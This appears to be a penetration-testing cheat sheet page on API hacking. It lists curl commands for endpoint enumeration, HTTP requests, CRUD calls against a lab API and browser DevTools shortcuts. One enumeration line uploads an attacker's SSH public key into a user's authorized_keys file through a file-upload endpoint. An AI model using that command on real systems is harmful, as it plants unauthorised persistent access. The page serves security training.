search
githubEdit

API Hacking

hashtag
Mindmap: https://github.com/Cyber-Guy1/API-SecurityEmpire/tree/main

hashtag
API Enumeration

curl -sv http://DOMAIN.LOCAL/api (Enumerate all API endpoints)
curl -sv http://DOMAIN.LOCAL/api --cookie "PHPSESSID=SESSION\_NUM" | jq (Authenticated api access)
curl -H 'Content-Type: multipart/form-data' -F file'@//home/ATTACKER/.ssh/id_rsapub.txt' -F filename='/home/USER/.ssh/authorized_keys' http://api.local/file-upload (Upload a file with cURL)

hashtag
cURL

Command

Description

curl -h

cURL help menu

curl inlanefreight.com

Basic GET request

curl -s -O inlanefreight.com/index.html

Download file

curl -k https://inlanefreight.com

Skip HTTPS (SSL) certificate validation

curl inlanefreight.com -v

Print full HTTP request/response details

curl -I https://www.inlanefreight.com

Send HEAD request (only prints response headers)

curl -i https://www.inlanefreight.com

Print response headers and response body

curl https://www.inlanefreight.com -A 'Mozilla/5.0'

Set User-Agent header

curl -u admin:admin http://<SERVER_IP>:<PORT>/

Set HTTP basic authorization credentials

curl http://admin:admin@<SERVER_IP>:<PORT>/

Pass HTTP basic authorization credentials in the URL

curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/

Set request header

curl 'http://<SERVER_IP>:<PORT>/search.php?search=le'

Pass GET parameters

curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/

Send POST request with POST data

curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/

Set request cookies

curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php

Send POST request with JSON data

hashtag
APIs

Command

Description

curl http://<SERVER_IP>:<PORT>/api.php/city/london

Read entry

curl -s http://<SERVER_IP>:<PORT>/api.php/city/ | jq

Read all entries

curl -X POST http://<SERVER_IP>:<PORT>/api.php/city/ -d '{"city_name":"HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'

Create (add) entry

curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london -d '{"city_name":"New_HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'

Update (modify) entry

curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City

Delete entry

hashtag
Browser DevTools

Shortcut

Description

[CTRL+SHIFT+I] or [F12]

Show devtools

[CTRL+SHIFT+E]

Show Network tab

[CTRL+SHIFT+K]

Show Console tab

PreviousWeb Application Penetration TestingNextAdvanced SQLi

Last updated